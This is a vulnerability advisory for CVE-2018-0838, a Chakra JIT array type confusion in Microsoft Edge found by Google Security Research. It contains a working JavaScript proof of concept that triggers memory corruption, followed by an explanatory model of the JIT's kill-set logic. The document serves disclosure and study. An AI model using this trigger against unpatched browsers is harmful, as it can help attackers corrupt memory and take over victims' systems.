Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion

15 Feb 2018 00:00:00 | Reported by Google Security Research | Type: packetstorm | Source: packetstormsecurity.com

Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor

CVE-2018-0838

This is similar to the previous issues 1457 and 1459 ("Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse"; MSRC 42551, MSRC 42552).

If a JavaScript function is used as a constructor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions, which are not checked by CheckJsArrayKills.

PoC:

```javascript
// Empty constructor, so the JIT can inline it and emit NewScObjectNoCtor.
function inlinee() {
}

function opt(arr) {
  arr[0] = 1.1;            // arr is profiled as a native float array
  new inlinee();           // makes inlinee.prototype a prototype object
  arr[0] = 2.3023e-320;    // stored with the stale native-float assumption
}

function main() {
  let arr = [1.1];
  // Warm up opt() with a harmless prototype so it gets JIT-compiled.
  for (let i = 0; i < 10000; i++) {
    inlinee.prototype = {};
    opt(arr);
  }

  // Now the array itself becomes the prototype of the new object.
  inlinee.prototype = arr;
  opt(arr);

  print(arr);              // print() is the ChakraCore shell (ch) builtin
}

main();
```

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt
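The kill-set logic the report points at, as an added illustration that is neither ChakraCore code nor the reporter's PoC: a constructed model in which the JIT caches the type it believes an array has and only opcodes in its kill set invalidate that cache. The opcode names, the `KILLS_*` sets, the instruction objects and the assumption that an array which becomes a prototype is widened from a native float array to a var array are all part of the model, not taken from the engine.

```javascript
// Constructed model (not ChakraCore code) of the JIT's array-type "kill" tracking:
// the JIT caches the type it believes an array has so it can emit an unchecked
// native store, and every instruction able to change that type must kill the cache.
const NATIVE_FLOAT = "NativeFloatArray";
const VAR_ARRAY = "VarArray";
// Opcodes the modelled analysis treats as array-type kills (illustrative names).
const KILLS_BUGGY = new Set(["CallDirect", "StElem_Generic"]);
// Fixed set: object creation makes the constructor's .prototype a prototype, and the
// model assumes an array that becomes a prototype is widened to a var array.
const KILLS_FIXED = new Set([...KILLS_BUGGY, "NewScObjectNoCtor"]);

// Modelled runtime effect of object creation on the array used as the prototype.
function applyRuntimeEffect(ins, actual) {
  if (ins.op === "NewScObjectNoCtor" && actual.has(ins.protoArray)) {
    actual.set(ins.protoArray, VAR_ARRAY);
  }
}

// For each native store, report whether the JIT would emit it unchecked and
// whether the cached type it relied on no longer matches the real one (stale).
function analyzeStores(instrs, kills) {
  const cached = new Map(), actual = new Map(), report = [];
  for (const ins of instrs) {
    if (ins.op === "LdArr") {
      cached.set(ins.dst, ins.type);
      actual.set(ins.dst, ins.type);
    } else if (ins.op === "StElemNative") {
      const assumed = cached.get(ins.arr);
      report.push({ unchecked: assumed !== undefined,
                    stale: assumed !== undefined && assumed !== actual.get(ins.arr) });
    } else {
      if (kills.has(ins.op)) cached.clear();  // forget all cached array types
      applyRuntimeEffect(ins, actual);
    }
  }
  return report;
}

// Instruction stream for opt() in the report, run with inlinee.prototype === arr.
const OPT_STREAM = [
  { op: "LdArr", dst: "arr", type: NATIVE_FLOAT },
  { op: "StElemNative", arr: "arr" },             // arr[0] = 1.1
  { op: "NewScObjectNoCtor", protoArray: "arr" }, // new inlinee()
  { op: "StElemNative", arr: "arr" },             // arr[0] = 2.3023e-320
];

function analyzeOpt() {
  return { buggy: analyzeStores(OPT_STREAM, KILLS_BUGGY),
           fixed: analyzeStores(OPT_STREAM, KILLS_FIXED) };
}
```

With the buggy kill set the second store is emitted unchecked against a stale type; once NewScObjectNoCtor is in the set the cache is dropped and the store must be type-checked.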
